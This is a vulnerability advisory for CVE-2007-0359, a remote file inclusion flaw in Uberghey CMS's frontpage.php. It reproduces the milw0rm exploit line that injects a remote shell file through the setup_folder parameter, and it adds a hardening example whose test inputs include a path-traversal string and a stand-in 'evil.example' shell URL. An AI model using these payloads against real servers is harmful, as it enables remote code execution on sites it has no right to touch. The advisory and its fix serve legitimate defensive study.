Uberghey frontpage.php Remote File Inclusion Vulnerability

Vulnerability ID: 1112029
Vulnerability type: Input validation
Published: 2007-01-17
Updated: 2007-01-21
CVE: CVE-2007-0359
CNNVD ID: CNNVD-200701-298
Platform: PHP
CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/3147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-298
|Vulnerability Details
Uberghey is an open-source, PHP-based web content management system. Uberghey CMS contains an input validation vulnerability that a remote attacker could exploit to execute arbitrary commands on the server with the privileges of the web server process. The frontpage.php script does not properly validate the setup_folder parameter before using it in an include() call, so an attacker can cause an arbitrary local or remote file to be included, which results in execution of arbitrary PHP code.
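As an added illustration that is not code from Uberghey or from the advisory, the include pattern quoted in the exploit section is shown next to a hardened replacement; the SETUP_FOLDER constant, the identifier patterns and the sample inputs are assumptions:

```php
<?php
// Added example, not Uberghey's own code: the include pattern the advisory
// quotes, next to a hardened replacement. SETUP_FOLDER, the identifier
// patterns and the sample inputs are assumptions for illustration.

// Vulnerable shape (frontpage.php, as quoted in the exploit): $setup_folder
// is attacker-controlled when it arrives from the request (e.g. through
// register_globals), so any local path or remote URL can be included.
function vulnerable_include_path(string $setup_folder, string $language, string $page_id): string
{
    return "$setup_folder/i18n/$language/$page_id.inc";
}

// Hardened replacement: the base folder is a server-side constant, the
// two remaining identifiers are allowlisted by pattern, and the resolved
// path must stay under the i18n directory (realpath() collapses ".." and
// returns false for missing files).
const SETUP_FOLDER = __DIR__ . '/setup';   // assumed install layout

function safe_i18n_path(string $language, string $page_id): ?string
{
    if (!preg_match('/^[a-z]{2}(_[A-Z]{2})?$/', $language)) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $page_id)) {
        return null;
    }
    $base = realpath(SETUP_FOLDER . '/i18n');
    if ($base === false) {
        return null;
    }
    $candidate = realpath($base . "/$language/$page_id.inc");
    if ($candidate === false
        || strncmp($candidate, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $candidate;
}

// Constructed inputs: a legitimate page, a traversal attempt and a URL of
// the kind the advisory describes. Only the first can ever resolve.
foreach ([['en', 'home'], ['../../etc', 'passwd'], ['http://evil.example', 'shell.txt?']] as [$lang, $page]) {
    $path = safe_i18n_path($lang, $page);
    printf("%-22s %-10s -> %s\n", $lang, $page, $path === null ? 'REJECTED' : $path);
}
// In frontpage.php the include then becomes:
//   $path = safe_i18n_path($language, $page_id);
//   if ($path === null) { http_response_code(400); exit; }
//   include $path;
```

With allow_url_include=Off (the PHP default) remote URLs are refused at the include itself, but that setting does nothing against inclusion of arbitrary local files, which is why the path check is still required.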
|Vulnerability Exploit
/###################################################################\
# Uberghey CMS 0.3.1                                                #
# =========================================================         #
# Published : 2007-01-17                                            #
# Remote: Yes                                                       #
# Site:http://switch.dl.sourceforge.net/sourceforge/uberghey/       #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.cN                                             #
# =====================================================             #
# ThanX=All My Friends-ABDULLAH00-Dr.Hail-MoHaNdKo-SilVeR_FaLCoN-Z4E#
# SpeciaL GreeTz : TrYaG-Team & 4lKaSrGoLd3N-Team                   #
\###################################################################/
/###################################################################\
# In :                                                              #
# /frontpag.php                                                     #
# LiNe:                                                             #
# /17                                                               #
# Vulnerable Code:                                                  #
# include("$setup_folder/i18n/$language/$page_id.inc");             #
# ExPlOiT :                                                         #
# /frontpage.php?setup_folder=shell.txt?                            #
#                                                                   #
#                                                                   #
#             /#######################################\             #
#             #         TrYaG.Com & DwRaT.Com         #             #
#             \#######################################/             #
\############################MAHMOOD_ALI############################/

# milw0rm.com [2007-01-17]
|References

Source: MILW0RM, Name: 3147, Link: http://www.milw0rm.com/exploits/3147
Source: VUPEN, Name: ADV-2007-0230, Link: http://www.frsirt.com/english/advisories/2007/0230
Source: VIM, Name: 20070118 source verify: Uberghey CMS 0.3.1 RFI, Link: http://www.attrition.org/pipermail/vim/2007-January/001247.html
Source: XF, Name: uberghey-frontpage-file-include (31553), Link: http://xforce.iss.net/xforce/xfdb/31553
Source: BID, Name: 22098, Link: http://www.securityfocus.com/bid/22098
Source: MILW0RM, Name: 3147, Link: http://milw0rm.com/exploits/3147